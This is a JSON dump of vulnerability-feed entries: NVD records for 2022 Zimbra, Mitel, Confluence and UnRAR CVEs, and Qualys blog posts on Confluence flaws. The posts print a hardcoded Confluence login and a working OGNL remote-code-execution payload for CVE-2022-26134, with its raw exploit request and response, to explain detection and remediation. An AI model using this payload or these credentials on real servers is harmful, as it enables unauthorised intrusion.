"cpe:/a:zimbra:collaboration:8.8.8", "cpe:/a:zimbra:collaboration:9.0.0", "cpe:/a:zimbra:collaboration:8.8.9", "cpe:/a:zimbra:collaboration:8.8.2", "cpe:/a:zimbra:collaboration:8.8.12", "cpe:/a:zimbra:collaboration:8.7.9", "cpe:/a:zimbra:collaboration:8.8.0", "cpe:/a:zimbra:collaboration:8.7.6", "cpe:/a:zimbra:collaboration:8.8.6", "cpe:/a:zimbra:collaboration:8.8.10"], "id": "CVE-2022-37393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37393", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:8.7.11:p13:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p11:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p12:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p31:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p30:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p19:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p2:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p33:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p14:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p27:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p6:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p9:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p25:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p15:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p23:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p34:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p32:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p0:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7.1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p11:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:35:19", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T02:15:00", "type": "cve", "title": "CVE-2022-29499", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-05-05T18:25:00", "cpe": ["cpe:/a:mitel:mivoice_connect:22.20.2300.0"], "id": "CVE-2022-29499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mitel:mivoice_connect:22.20.2300.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:30:52", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T18:15:00", "type": "cve", "title": "CVE-2022-26138", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T14:13:00", "cpe": ["cpe:/a:atlassian:questions_for_confluence:2.7.35", "cpe:/a:atlassian:questions_for_confluence:2.7.34", "cpe:/a:atlassian:questions_for_confluence:3.0.2"], "id": "CVE-2022-26138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:2.7.35:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:3.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27924", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-05-03T12:59:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27924", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27924", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:37:15", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-09T08:15:00", "type": "cve", "title": "CVE-2022-30333", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-10-26T02:35:00", "cpe": [], "id": "CVE-2022-30333", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27925", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-10-28T19:11:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27925", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:30:53", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T22:15:00", "type": "cve", "title": "CVE-2022-26134", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T06:15:00", "cpe": ["cpe:/a:atlassian:confluence_data_center:7.18.0", "cpe:/a:atlassian:confluence_server:7.18.0"], "id": "CVE-2022-26134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:confluence_server:7.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:confluence_data_center:7.18.0:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2022-08-19T00:02:03", "description": "Over the last few months, Atlassian Confluence has increasingly become a target for attackers. In June 2022, a critical severity OGNL Remote Code Execution vulnerability was disclosed (CVE-2022-26134). More recently, CVE-2022-26138 was disclosed on social media platforms in July 2022.\n\nIn CVE-2022-26138, a Confluence user account is created by the Questions for Confluence app with hardcoded credentials stored inside the plugin jar file available on [Atlassian packages](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>). An attacker with knowledge of these credentials could log into the Confluence application and access all contents within the confluence-users group. [Atlassian](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has rated the vulnerability &quot;critical&quot; and highlighted that the vulnerability is being exploited in the wild.\n\nDue to the nature of this vulnerability, it can only be verified remotely by logging into the Confluence application with the hardcoded credentials. Traditional open source scanners and scripts are checking for the Location HTTP response header and 302 status code to verify the credentials, which could result in false positives. [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released QID 150556 that confirms the vulnerability detection in two steps. The detection takes an additional step to verify the valid credentials by navigating to the user profile page and verifying that the correct page is returned. This check is much more efficient in comparison to open source scanners and eliminates any possibility of false positives.\n\n## About CVE-2022-26138\n\nAccording to Confluence&#x27;s [Questions for Confluence Security Advisory](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), both Confluence Server and Confluence Data Center products using affected versions of the Questions for Confluence app are impacted by CVE-2022-26138.\n\nAffected versions :\n\nQuestions for Confluence 2.7.x| 2.7.34 \n2.7.35 \n---|--- \nQuestions for Confluence 3.0.x| 3.0.2 \n \n## Hardcoded Credentials Vulnerability\n\nAffected versions of the Questions for Confluence app, when installed on a Confluence application, create a user account with username `disabledsystemuser` and password `disabled1system1user6708` and the account is added to confluence-users group, which allows viewing and editing all non-restricted pages within Confluence [by default](<https://confluence.atlassian.com/doc/confluence-groups-139478.html>). A remote attacker can easily leverage these credentials to browse sensitive contents within the Confluence application.\n\nThese hardcoded credentials are stored in `default.properties` file inside a [`confluence-questions-X.X.X.jar` file](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>), as shown below.\n\n\n\n## Detecting the Vulnerability with Qualys Web Application Scanning\n\nExisting Qualys customers can detect CVE-2022-26138 on their target Confluence instance with Qualys Web Application Scanning (WAS) using the following Qualys ID (QID):\n\n * 150556 : Atlassian Confluence Server and Data Center : Questions for Confluence App - Hardcoded Credentials (CVE-2022-26138)\n\nThe QID is part of the core category. A vulnerability scan with a core or custom search list including the QID in the options profile will flag all vulnerable applications, as shown below.\n\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, the user will see similar results in the vulnerability scan report, as shown here:\n\n\n\n### Solution &amp; Mitigation\n\nTo remediate this vulnerability, any organization using the Questions for Confluence app is advised to ensure the following:\n\n * Upgrade to Version 2.7.x >= 2.7.38 (compatible with Confluence 6.13.18 through 7.16.2) and Versions >= 3.0.5 (compatible with Confluence 7.16.3 and later)\n * Disable or delete the disabledsystemuser account\n\nPlease note that uninstalling the Questions for Confluence app does not remediate this vulnerability. The disabledsystemuser account does not automatically get removed after the app has been uninstalled. It is possible for this account to be present if the Questions for Confluence app was previously installed. It is advised to check the list of active users to ensure the Confluence instance is not affected.\n\n### Credit\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>\n\n### CVE Details:\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26138>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T10:12:53", "type": "qualysblog", "title": "Atlassian Confluence: Questions for Confluence App Hardcoded Credentials Vulnerability (CVE-2022-26138)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138"], "modified": "2022-08-17T10:12:53", "id": "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T21:59:19", "description": "On June 02, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. The vulnerability is tracked as [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) with 9.8 CVSSv3 score with multiple proof of concept exploits released by security researchers on GitHub. \n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) released QID 150523 on June 08, 2022, to detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n## About CVE-2022-26134\n\nCVE-2022-26134 is an unauthenticated OGNL Injection remote code execution vulnerability affecting Confluence Server and Data Center versions after 1.3.0. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited it would allow the attacker to execute commands remotely with user privileges running the Confluence application. The vulnerability is fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.\n\n### OGNL Injection\n\nObject-Graph Navigation Language (OGNL) is an open-source Expression Language (EL) used for getting and setting the properties of Java objects. An OGNL Injection occurs when there is insufficient validation of user-supplied data, and the EL interpreter attempts to interpret it enabling attackers to inject their own EL code.\n\nIn the case of CVE-2022-26134, the RCE attack is not complex in nature. The attack can be executed by simply sending the OGNL payload in the request URI. The payload can be crafted to add a custom HTTP response header that prints the output of successfully executed remote commands.\n\nRCE Payload\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Qualys-Response\",#a))}\n\nBreaking the above payload, variable `a` is assigned the value of an expression which calls various static methods using syntax `@class@method(args)`, where `java.lang.Runtime` class calls `exec` method which executes `id` command and the output is stored in the variable `a`.\n\nNext, from package `com.opensymphony.xwork2` class `ServletActionContext` is called which uses `getResponse` and `setHeader` method to fetch response of `id` system command in `X-Qualys-Response` custom header.\n\n### Exploit POC\n\nREQUEST\n \n \n GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n Host: 127.0.0.1:8090\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nRESPONSE\n \n \n HTTP/1.1 302 \n Cache-Control: no-store\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n X-Confluence-Request-Time: 1655819234897\n Set-Cookie: JSESSIONID=7AE586C9E49E2301BA33E5A1552D8C6F; Path=/; HttpOnly\n X-XSS-Protection: 1; mode=block\n X-Content-Type-Options: nosniff\n X-Frame-Options: SAMEORIGIN\n Content-Security-Policy: frame-ancestors 'self'\n X-Qualys-Response: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence)\n Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n Content-Type: text/html;charset=UTF-8\n Content-Length: 0\n Date: Tue, 21 Jun 2022 13:47:14 GMT\n Connection: close\n\nOnce the exploit is triggered it can be seen `X-Qualys-Response` HTTP response header contains the output of the `id` system command resulting in successful exploitation of this remote code execution vulnerability.\n\n## Exploit Analysis\n\nWhile analyzing the above RCE request, the Qualys WAS research team came across the Catalina log file in Confluence Server stored at `/opt/atlassian/confluence/logs/catalina.YYYY-MM-DD.log` which had multiple entries of web requests sent, along with output from `stdout` and `stderr`. Following is the snippet from the log file printing stack trace for the RCE request:\n\n* * *\n \n \n 07-Jun-2022 10:37:00.565 WARNING [Catalina-utility-4] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-17] (id=[347]) has been active for [75,417] milliseconds (since [6/7/22 10:35 AM]) to serve the same request for [http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and\n may be stuck.\n java.lang.Throwable\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1247)\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)\n at ognl.OgnlParser.primaryExpression(OgnlParser.java:1494)\n at ognl.OgnlParser.navigationChain(OgnlParser.java:1245)\n [..SNIP..]\n at ognl.Ognl.parseExpression(Ognl.java:113)\n at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at 